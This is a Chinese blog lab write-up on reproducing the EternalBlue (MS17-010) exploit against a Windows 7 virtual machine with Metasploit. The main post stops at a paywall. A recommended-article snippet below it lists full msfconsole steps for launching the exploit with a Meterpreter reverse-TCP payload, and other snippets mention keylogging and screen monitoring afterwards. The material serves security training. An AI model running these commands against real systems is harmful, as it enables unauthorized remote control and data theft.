永恒之蓝漏洞复现记录

最新推荐文章于 2024-12-08 18:10:24 发布
最新推荐文章于 2024-12-08 18:10:24 发布
阅读量1.6k 收藏 9
点赞数 34
分类专栏: # 漏洞复现记录 文章标签: web安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_79155654/article/details/141784392
版权

准备工作

实验环境搭建
  • 下载并安装VMware Workstation软件
  • 查看VMware的虚拟网卡和虚拟网络设置
  • 安装Windows虚拟机镜像和Kali linux虚拟机镜像
实验目的
  • 掌握Windows网络服务远程渗透攻击基本理论知识。
  • 掌握Windows漏洞及漏洞利用方法原理。
  • 掌握Windows网络服务远程渗透攻击防范措施。
  • 了解渗透测试软件Metasploit并掌握操作使用Metasploit进行Windows远程渗透攻击的方法。

知识点整理

漏洞与漏洞利用

漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或者破坏系统。

漏洞利用是指用户从目标系统中找到容易攻击的漏洞,然后利用漏洞获得权限。

WannaCry勒索病毒

病毒指编织者在计算机程序中插入的破坏计算机功能或者破坏数据、影响计算机使用并且能够自我复制的一组计算机指令或者程序编码。

2017年5月爆发的WannaCry病毒,是一种蠕虫式勒索病毒。

不法分子利用危险漏洞MS17-010“永恒之蓝”(Windows操作系统445端口存在过的漏洞)进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry病毒进行感染,并作为攻击机再次扫描互联网或局域网其他机器,形成蠕虫感染大范围超快速扩散。

Metasploit

Metasploit渗透测试软件是附带数百个已知软件漏洞的专业级漏洞检测和攻击工具,通过它可以很容易的获取、开发并对计算机软件漏洞实施攻击,也可以帮助专业安全人士识别安全性问题、验证漏洞缓解措施。

Metasploit软件采用开发框架和模块组件的可扩展模型,模块组件是真正实施渗透攻击的代码,比如利用安全漏洞的Exploits模块、进行扫描和查看等其他辅助任务的Auxiliary模块等。

Metasploit软件提供四种不同的用户交互接口,其中MSF交互终端(MSFCONSOLE)比较常用。MSFCONSOLE可获得用户连接到主机的信息,从而利用漏洞,使得用户能启动渗透攻击目标系统。

MSFCONSLOE常用命令

search:搜索一个特定模块

use:选择使用特定的模块

run:启动一个非渗透测试模块

exploit:实施渗透攻击

set:配置各种类型模块中的详细参数

quit/exit:退出终端

show:查看每种类型模块的详细配置参数

实验过程

1)对Windows靶机上的MS17-010漏洞进行远程渗透攻击,获得目标主机的访问权

第一步:设置环境:

  • 确保Kali linux和Windows靶机都在同一个网络中。
  • 检查Windows靶机的IP地址。

查询Kali的IP地址:

image-20240826201310195

查询Windows7的IP地址:

image-20240826201444011

容易发现IP地址均为192.168.175.xxx ,判断两个计算机都处于同一个网络中。

使用Kali攻击机ping Windows靶机:

image-20240826203546904

使用Windows靶机ping Kali攻击机:

image-20240826202647377

证明两台计算机可以互相通信。

在Kali中启用Metasploit:

image-20240826203747781

搜索MS17-010漏洞的相关模块:

image-20240826212552503

选择合适的expolit模块:(这里选择的是ms17_010_eternalbue)

image-20240826212805242

设定RHOSTS和其他必要参数:

设定靶机的IP地址:

image-20240826213012056

设置payload(指的是在攻击过程中实际执行的代码或命令,这些代码或命令是嵌入在攻击载荷中的。当一个漏洞被成功利用时,payload 就会被执行,从而实现攻击者的目的。):

最低0.47元/天 解锁文章
永恒之蓝MS17010漏洞利用,以及日志特征和MSF使用方法
yuanlirong22的专栏
09-03 1788
介绍如何利用永恒之蓝MS17010漏洞攻击,以及攻击成果后的操作系统日志分析,看看默认的操作系统日志是什么,方便在应急排查时对攻击有个清晰的了解
永恒之蓝漏洞复现
qq_61024461的博客
07-17 337
永恒之蓝漏洞复现
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 5064
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
MS17-010(Eternal blue永恒之蓝漏洞利用记录
deginner2的博客
02-21 3362
MS17-010(Eternal blue永恒之蓝漏洞利用记录
永恒之蓝漏洞复现(ms17-010) 及windows日志对比分析
Sp4rkW的博客
01-27 7047
漏洞描述 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 影响版本 目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows ...
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 4万+
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2356
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
永恒之蓝漏洞复现及上传后门程序
dreamthe的博客
11-18 3982
自己实在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,自己去选择版本 这里记得选择桥接模式 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 可以ka里面用nmap扫描靶机开了那些端口 输入msfdb run 进入msf中 开始搜索ms17_010 命令 search ms17_010 先使用aux模块扫描靶机有无漏洞 步骤如下 第一步 使用扫描模块 use a...
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 8520
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
利用永恒之蓝对win7进行键盘记录
最新发布
weixin_46023655的博客
12-08 203
打开kali中的msfconsole找到永恒之蓝,设置靶机ip,后可以exploit,也可以run连接成功查看进程,选择监听靶机win7上的cmd.exe进程 当前进程不是1484,需要迁移到1484 cmd.exe,进程迁移键盘监听,查看结果
meterpreter 监控桌面命令(screenshare)
weixin_44257023的博客
03-05 3355
meterpreter 监控桌面命令如下 在练习使用 msf 渗透框架玩耍时,无论是正向还是返向 shell 控制端一般都是这个 meterpreter > ,那么如何动态监控靶机现在正在看什么那? 只用 screenshare 命令监控桌面 screenshare 执行命令如图: 使用命令之后会自动打开浏览器,并在如上图的 /root/生成了两个文件 监控画面如下: ...
永恒之蓝复现-网络安全新手的兴趣以及小知识
Mjj567的博客
03-22 565
复现永恒之蓝
勒索病毒“WannaCry”之复现过程(永恒之蓝
weixin_40950781的博客
08-09 8966
勒索病毒“WannaCry”复现永恒之蓝)1.漏洞简述2.漏洞复现2.1复现环境2.3复现过程2.3.3 开始攻击3.结语4.防范 1.漏洞简述 “永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统;被扫描到的Windows系统,只要开机上线,不要要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等...
永恒之蓝漏洞复现(ms17-010)
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
metasploit运行run vnc
天元喜羊羊的博客
04-27 1万+
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.142 RHOST => 192.168.1.142 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
实验一:永恒之蓝攻击复现实验报告
qq_44118750的博客
05-15 5601
姓名:软工女孩(b站同名) 一、实验项目名称 使用KALI进行MS17_010渗透提权 二、实验目的及要求 熟悉kali的基本安装与使用 理解软件msf的模块调用与使用 掌握MS17_010的模块的mimikatz软件使用 掌握windows的密码破解以及hash破解 三、实验环境 Windows、KALI 四、实验内容 5. 掌握永恒之蓝的使用以及msf模块的使用 6. 掌握基本提权与后门维持 五、实验步骤 1、搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按
反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历
12-08 7726
反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历前言故事一:SSDP DDoS故事二:EternalBlue(永恒之蓝)总结参考 作者:高玉涵 时间:2021.12.07 15:45 博客:blog.youkuaiyun.com/cg_i 前言  就在昨天下午我所处的内网被 DDoS 攻击,万幸的是攻击来自内部,除所处网络因攻击不堪重负瘫痪,期间并未波及其它。因发生在内部,定位也较为轻松,找到中毒的电脑,拔掉它的网线、杀毒、打上补丁,故障排除。本想“事去佛衣了”没曾想,今天一大早
永恒之蓝漏洞复现ubuntu
12-06
永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用了Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些版本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞被利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

下雨的清晨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值